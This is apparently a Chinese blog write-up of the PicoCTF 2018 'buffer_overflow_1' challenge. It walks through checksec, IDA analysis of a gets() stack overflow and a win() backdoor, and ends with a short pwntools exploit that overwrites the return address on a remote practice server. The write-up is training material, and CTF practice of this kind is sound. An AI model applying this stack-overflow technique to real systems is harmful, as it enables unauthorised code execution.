PicoCTF_2018_buffer_overflow_1

放入虚拟机checksec一下

PicoCTF_2018_buffer_overflow_1_第1张图片

32位且什么都没开

 丢入ida

PicoCTF_2018_buffer_overflow_1_第2张图片

查看vuln()函数

PicoCTF_2018_buffer_overflow_1_第3张图片

发现get()函数,栈溢出

PicoCTF_2018_buffer_overflow_1_第4张图片

又找到win()后门函数 

exp:

 

from pwn import *
context.log_level='debug'
io=remote('node4.buuoj.cn',28157)

flag=0x80485CB
payload='a'*0x28+'b'*0x4+p32(flag)
io.sendlineafter(':',payload)

io.interactive()

flag:

 

 

你可能感兴趣的:(Buuoj刷题,安全)